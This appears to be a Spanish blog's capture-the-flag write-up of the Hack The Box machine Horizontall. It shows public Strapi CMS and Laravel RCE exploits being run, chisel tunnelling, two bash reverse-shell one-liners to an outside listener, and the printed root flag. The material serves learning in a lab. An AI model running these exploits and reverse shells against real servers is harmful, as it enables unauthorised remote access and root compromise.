Seguridad x Redes: HTB

Introduction

IP: 10.10.11.105

S.O.: Ubuntu

For today I will show you how to exploit strapi CMS via a RCE and Laravel also using a RCE

Enumeration

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)

| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)

|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)

80/tcp open http nginx 1.14.0 (Ubuntu)

|_http-server-header: nginx/1.14.0 (Ubuntu)

|_http-title: Did not follow redirect to http://horizontall.htb

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The http:10.10.11.105 redirects to http://horizontall.htb, so it means we need to add this host in /etc/hosts in oder to be able to resolv the hostname.

Then we access to http://horizontal.htb,

there is not any important thing, but if we have a look at the source page we see this message:

that gives us a clue

So it is worth to have a look at the js used by the application

We identify 2 js scripts:

/js/chunk-vendors.0e02b89e.js

/js/app.c68eb462.js

I usually look for subdomains IP addresses, api keys, passwords,

we found this sub-domain in app.c68eb462.js

r.a.get("http://api-prod.horizontall.htb/reviews")

We run wfuzz on http://api-prod.horizontall.htb/reviews

wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 http://api-prod.horizontall.htb/FUZZ

000000259: 200 16 L 101 W 854 Ch "admin"

000000202: 403 0 L 1 W 60 Ch "users"

000000137: 200 0 L 21 W 507 Ch "reviews"

we load in the browser next url:

http://api-prod.horizontall.htb/admin/auth/login

and we see the web is running the strapi CMS

if we look for known vulnerabilities, we found this one:

https://www.exploit-db.com/exploits/50239

FootHold

It is an unauthenticated RCE

kali# python3 50239.py http://api-prod.horizontall.htb

[+] Checking Strapi CMS Version running

[+] Seems like the exploit will work!!!

[+] Executing exploit

[+] Password reset was successfully

[+] Your email is: admin@horizontall.htb

[+] Your new credentials are: admin:SuperStrongPassword1

[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwOTYyMTU5LCJleHAiOjE2MzM1NTQxNTl9.N9hRodaT44QcUlcDzgqV7_70x_WjLZoX9EjbgDW9Osc

$> whoami

[+] Triggering Remote code executin

[*] Rember this is a blind RCE don't expect to see output

{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

We cannot see the output as it is blind RCE, so we can run a netcat to get a reverse shell:

$> /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/443 0>&1'

[+] Triggering Remote code executin

[*] Rember this is a blind RCE don't expect to see output

$ sudo nc -nlvp 443

listening on [any] 443 ...

connect to [10.10.14.13] from (UNKNOWN) [10.10.11.105] 32972

bash: cannot set terminal process group (1890): Inappropriate ioctl for device

bash: no job control in this shell

strapi@horizontall:~/myapi$ whoami

whoami

strapi

strapi@horizontall:~/myapi$

Priviledge Escalation

There are couple of services running on localhost port 1137 and 8000

Let's use a port fordwarding to make those ports visible on my local computer:

root@kali# ./chisel64 server --reverse

2021/09/09 21:49:54 server: Reverse tunnelling enabled

2021/09/09 21:49:54 server: Fingerprint Pv3bbM6067kXgJPlO3Br9eGph1ANPH3DmGEIq/W6i58=

2021/09/09 21:49:54 server: Listening on http://0.0.0.0:8080

2021/09/09 21:49:57 server: session#1: tun: proxy#R:1137=>1137: Listening

2021/09/09 21:50:12 server: session#2: tun: proxy#R:8000=>8000: Listening

strapi@horizontall:/dev/shm$ ./chisel64 client 10.10.14.13:8080 R:8000:127.0.0.1:8000

2021/09/09 19:56:01 client: Connecting to ws://10.10.14.13:8080

2021/09/09 19:56:02 client: Connected (Latency 121.791548ms)

If we connect now from my kali to http://127.0.0.1:8000, I can see a Laravel software running on that port

Version is v8

we find this RCE exploit for V8

https://www.exploit-db.com/exploits/49424

Let's try it:

python 49424.py http://127.0.0.1:8000 /var/www/html/laravel/storage/logs/laravel.log 'id'

Phpggc not found!

Run command: git clone https://github.com/ambionics/phpggc.git

Clonando en 'phpggc'...

remote: Enumerating objects: 2587, done.

remote: Counting objects: 100% (929/929), done.

remote: Compressing objects: 100% (522/522), done.

remote: Total 2587 (delta 374), reused 812 (delta 283), pack-reused 1658

Recibiendo objetos: 100% (2587/2587), 388.83 KiB | 1.06 MiB/s, listo.

Resolviendo deltas: 100% (1016/1016), listo.

Exploit...

Traceback (most recent call last):

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 699, in urlopen

httplib_response = self._make_request(

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 445, in _make_request

six.raise_from(e, None)

File "<string>", line 3, in raise_from

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 440, in _make_request

httplib_response = conn.getresponse()

File "/usr/lib/python3.9/http/client.py", line 1347, in getresponse

response.begin()

File "/usr/lib/python3.9/http/client.py", line 307, in begin

version, status, reason = self._read_status()

File "/usr/lib/python3.9/http/client.py", line 276, in _read_status

raise RemoteDisconnected("Remote end closed connection without"

http.client.RemoteDisconnected: Remote end closed connection without response

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 439, in send

resp = conn.urlopen(

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 755, in urlopen

retries = retries.increment(

File "/usr/local/lib/python3.9/dist-packages/urllib3/util/retry.py", line 532, in increment

raise six.reraise(type(error), error, _stacktrace)

File "/usr/local/lib/python3.9/dist-packages/urllib3/packages/six.py", line 734, in reraise

raise value.with_traceback(tb)

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 699, in urlopen

httplib_response = self._make_request(

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 445, in _make_request

six.raise_from(e, None)

File "<string>", line 3, in raise_from

File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 440, in _make_request

httplib_response = conn.getresponse()

File "/usr/lib/python3.9/http/client.py", line 1347, in getresponse

response.begin()

File "/usr/lib/python3.9/http/client.py", line 307, in begin

version, status, reason = self._read_status()

File "/usr/lib/python3.9/http/client.py", line 276, in _read_status

raise RemoteDisconnected("Remote end closed connection without"

urllib3.exceptions.ProtocolError: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

File "/home/alter/htb-vip/horizontall/49424.py", line 125, in <module>

main()

File "/home/alter/htb-vip/horizontall/49424.py", line 112, in main

clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))

File "/home/alter/htb-vip/horizontall/49424.py", line 34, in clear_log

while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass

File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 119, in post

return request('post', url, data=data, json=json, **kwargs)

File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 61, in request

return session.request(method=method, url=url, **kwargs)

File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 542, in request

resp = self.send(prep, **send_kwargs)

File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 655, in send

r = adapter.send(request, **kwargs)

File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 498, in send

raise ConnectionError(err, request=request)

requests.exceptions.ConnectionError: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

root@kali:/home/alter/htb-vip/horizontall#

We find this website

https://book.hacktricks.xyz/pentesting/pentesting-web/laravel

http://127.0.0.1:8000/profiles

The site default an exception,

ErrorException Undefined variable: informat (View: /home/developer/myproject/resources/views/profile/index.blade.php)

http://127.0.0.1:8000/profiles

so it means debugging is enable, and then we get the laravel logs path, so with this information we can try the exploit again

/home/developer/myproject/resources/views/profile/index.blade.php

kali:$ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'id'

Exploit...

uid=0(root) gid=0(root) groups=0(root)

kali$ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.13/80 0>&1"'

root@kali:/home/alter# nc -nlvp 80

listening on [any] 80 ...

connect to [10.10.14.13] from (UNKNOWN) [10.10.11.105] 53166

bash: cannot set terminal process group (62649): Inappropriate ioctl for device

bash: no job control in this shell

root@horizontall:/home/developer/myproject/public# cat /root/root.txt

cat /root/root.txt

9408100a11868ee3fede5e56421ef930

root@horizontall:/home/developer/myproject/public#

Seguridad x Redes

sábado, 5 de febrero de 2022

HTB - HORIZONTALL

No hay comentarios:

Publicar un comentario

Etiquetas

Archivo del blog